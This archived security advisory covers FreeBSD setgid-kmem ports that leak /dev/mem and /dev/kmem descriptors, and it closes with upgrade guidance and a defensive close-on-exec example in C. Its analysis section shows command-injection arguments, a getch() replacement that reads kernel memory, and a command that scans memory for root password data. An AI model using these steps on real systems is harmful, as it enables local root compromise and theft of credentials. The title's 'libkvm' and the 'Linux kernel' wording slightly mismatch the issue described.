17th Sep 2002 [SBWID-5696]
COMMAND
		libkvm permits privilege escalation
SYSTEMS AFFECTED
		All software linked to libkvm prior to FreeBSD 4.6.2-RELEASE
PROBLEM
		From an issue exclusively disclosed to iDEFENSE by [[email protected]]
		[http://www.idefense.com/contributor.html], David Endler posted:
		The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be
		locally manipulated to take advantage of open file descriptors to
		/dev/mem and /dev/kmem to gain root privileges on a target host. These
		five programs are installed setgid kmem by default. They will drop kmem
		privileges before executing user-specified commands, but file
		descriptors to /dev/mem and /dev/kmem will remain open. This can lead
		to a local root compromise in various ways (e.g. if an attacker chooses
		to scan for the master password file in the Linux kernel memory).
ANALYSIS
		The latest versions of all five above-mentioned FreeBSD ports are
		vulnerable; the following examples illustrate the problem:
		
		bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
		dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
		dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
		dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
		dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ cat .wmmonrc
		left "/home/dim/dummy"
		bash-2.05a$ wmmon &
		[1] 793
		bash-2.05a$ Monitoring 5 devices for activity.
		current stat is :1
		bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
		dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
		dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
		wmnet: using kmem driver to monitor ec0
		dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
		dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem
		
		One possible exploit for these vulnerabilities is to replace getch() in
		strings(1) with:
		
		#include <unistd.h>   /* read(2) */
		
		/* Replacement getch() for strings(1): instead of reading from the
		   input file, read one byte at a time from descriptor 4, which is
		   the /dev/mem descriptor inherited from the setgid parent (see the
		   lsof output above). */
		int getch(void)
		{
		    char buf[4];
		    read(4, buf, 1);
		    return buf[0];
		}
		
		or a similar, less CPU-expensive function that reads a character from
		the /dev/mem file descriptor, and then execute the following:
		
		wmnet2 -e exploit|grep root|grep Charlie
		
		
SOLUTION
		Upgrade your vulnerable system to 4.6-STABLE, or to the RELENG_4_6,
		RELENG_4_5, or RELENG_4_4 security branch dated after the correction
		date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27).
		Alternatively you could remove the setgid bit from the affected
		applications, at the cost of reduced functionality:
		
		 chmod g-s /path.to/wmnet2
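		The underlying defect is a descriptor opened by a privileged program
		that is not marked close-on-exec, so it survives the exec of a
		user-specified command even after the group privilege has been dropped.
		The program below is an added example (not code from the advisory or
		from FreeBSD's fix): it checks a descriptor for FD_CLOEXEC, applies the
		fix, and verifies empirically that a child shell can no longer reach
		the descriptor. /dev/null stands in for /dev/kmem (an assumption) so
		the program runs unprivileged.

```c
/* Added example (not code from the advisory or FreeBSD's fix). A privileged
 * helper's descriptor survives exec unless marked close-on-exec; this shows
 * the check and the fix. /dev/null stands in for /dev/kmem (assumption). */
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Open as the vulnerable ports did: plain open(2), no close-on-exec. */
int open_inheritable(void) {
    return open("/dev/null", O_RDONLY);
}

/* 1 if fd carries FD_CLOEXEC, 0 if not, -1 if fd is invalid. */
int is_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    return flags < 0 ? -1 : ((flags & FD_CLOEXEC) != 0);
}

/* The fix: mark the descriptor close-on-exec before the program can exec
 * anything user-specified. Returns 0 on success, -1 on failure. */
int set_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    return flags < 0 ? -1 : fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Empirical check: exec a shell that tries to dup the descriptor onto its
 * stdin. 1 = child could still reach fd (it leaked across exec), 0 = the
 * shell found it closed, -1 = fork/wait failed. */
int leaks_across_exec(int fd) {
    char cmd[32];
    snprintf(cmd, sizeof cmd, ": <&%d", fd);   /* ':' only performs the redirect */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 1 : 0;
}

int main(void) {
    int fd = open_inheritable();
    printf("before fix: cloexec=%d leaks=%d\n", is_cloexec(fd), leaks_across_exec(fd));
    set_cloexec(fd);
    printf("after fix:  cloexec=%d leaks=%d\n", is_cloexec(fd), leaks_across_exec(fd));
    return close(fd);
}
```

		The same fcntl(F_GETFD) check, run over every open descriptor just
		before a setgid program drops privileges, is a cheap audit for this
		whole class of leak.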